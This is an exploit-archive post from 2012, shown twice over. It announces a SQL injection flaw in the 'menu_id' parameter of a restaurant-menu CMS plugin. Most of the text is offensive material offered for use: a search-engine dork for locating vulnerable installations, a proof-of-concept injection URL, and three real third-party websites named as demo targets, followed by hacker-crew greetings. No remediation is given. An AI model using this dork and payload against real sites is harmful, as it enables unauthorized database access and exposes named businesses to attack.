Filename | Restu menu Sql Vulnerability |
Permission | rw-r--r-- |
Author | RetnO |
Date and Time | 10:21 AM |
Label | Exploits |
Action |
Vulnerability info
Title: Restu menu Sql Vulnerability
Vendor: http://www.flickmedialtd.com/
Date: 25/06/2012
Author: RetnOHacK #Procoder'z Team Albania
Email: RetnOHacK1@gmail.com , fb.me/root.procoderz
Category: Webapps
Dork: inurl:"/cmsadmin/" intext:"version-1.6.6"
Tested on: Windows xp , Ubuntu BT~5
Vulnerability Details
Input passed via the "menu_id" parameter in image.php is not properly sanitised before being used in SQL queries.
So we can use it to inject our own SQL Code.
Exploit/p0c:
www.site.com/cmsadmin/plugins/Resturant_menu/image.php?menu_id=[SQL]'
Demo site: http://www.dhakahandicrafts.com/cmsadmin/plugins/product/image.php?menu_id=63'
http://www.baburchi.biz/cmsadmin/plugins/Resturant_menu/image.php?menu_id=93'
http://www.lagateau.co.uk/cmsadmin/plugins/Resturant_menu/image.php?menu_id=2'
Greetz to : Mataty501, dA3m0n, wino, b4ti, R-t33n, 0x0, **RoAd_KiLlEr** & U
source : http://www.exploit4arab.net/exploits/151
Title: Restu menu Sql Vulnerability
Vendor: http://www.flickmedialtd.com/
Date: 25/06/2012
Author: RetnOHacK #Procoder'z Team Albania
Email: RetnOHacK1@gmail.com , fb.me/root.procoderz
Category: Webapps
Dork: inurl:"/cmsadmin/" intext:"version-1.6.6"
Tested on: Windows xp , Ubuntu BT~5
Vulnerability Details
Input passed via the "menu_id" parameter in image.php is not properly sanitised before being used in SQL queries.
So we can use it to inject our own SQL Code.
Exploit/p0c:
www.site.com/cmsadmin/plugins/Resturant_menu/image.php?menu_id=[SQL]'
Demo site: http://www.dhakahandicrafts.com/cmsadmin/plugins/product/image.php?menu_id=63'
http://www.baburchi.biz/cmsadmin/plugins/Resturant_menu/image.php?menu_id=93'
http://www.lagateau.co.uk/cmsadmin/plugins/Resturant_menu/image.php?menu_id=2'
Greetz to : Mataty501, dA3m0n, wino, b4ti, R-t33n, 0x0, **RoAd_KiLlEr** & U
source : http://www.exploit4arab.net/exploits/151